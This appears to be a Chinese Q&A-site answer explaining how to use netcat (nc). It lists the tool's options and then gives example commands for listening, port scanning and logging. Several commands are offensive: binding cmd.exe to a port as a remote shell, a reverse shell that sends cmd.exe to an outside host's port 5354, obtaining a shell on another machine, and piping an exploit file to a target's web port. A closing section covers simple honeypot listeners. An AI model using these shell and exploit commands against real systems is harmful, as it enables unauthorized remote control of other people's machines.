nc如何使用

黑客的瑞士军刀nc如何使用,本人只懂一点,请详细介绍一下端口刺探

一、基本使用
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:

-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
G num source-routing pointer: 4, 8, 12, …
-I secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-t 以telnet的形式应答
-u UDP模式
-v 详细输出——用多个-v可得到更详细的内容
-z 将输入输出关掉——用于扫描时
-w secs timeout的时间
二. 它的简单使用方法
1.nc -l -p 80
监听80端口
2.nc -l -p 80 >c:\log.dat
监听80端口,并把信息记录到log.dat
3.nc -v -l -p 80
监听80端口,并显示端口信息
4.nc -l -p 80 -t -e cmd.exe
监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答
5.nc -v ip port
扫描某ip的某个端口
6.nc -v -z ip port-port
扫描某ip的某端口到某端口
7.nc -v -z -u ip port-port
扫描某ip的某udp端口到某udp端口
7.扫描远程主机
nc -nvv -w2 -z 192.168.x.x 80-445
扫描192.168.x.x的TCP 80到TCP445的所有端口
8.REMOTE主机绑定SHELL
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
9.REMOTE主机绑定SHELL并反向连接
nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
三.使用的例子
1. 计算机192.168.0.1运行:nc -v -n -p 99
计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99
这样我们就获得了192.168.0.8的一个shell
2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99
计算机192.168.0.8运行:nc -v -l -p 99 >d:\sc.exe
四.高级用法:
1.作攻击程序用
格式1:type c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
连接到192.168.x.x的80端口,并在其管道中发送’c:\exploit.txt’的内容(两种格式确有相同的效果, 真是有异曲同工之妙)
2.作蜜罐用
nc -L -p 80 > c:\log.txt
使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:\log.txt’中,如果把’>’ 改为’>>’即可以追加日志
3.作蜜罐用
nc -L -p 80 < c:\honeypot.txt
使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,并把’c:\honeypot.txt’的内容’送’入其 管道中
温馨提示:答案为网友推荐,仅供参考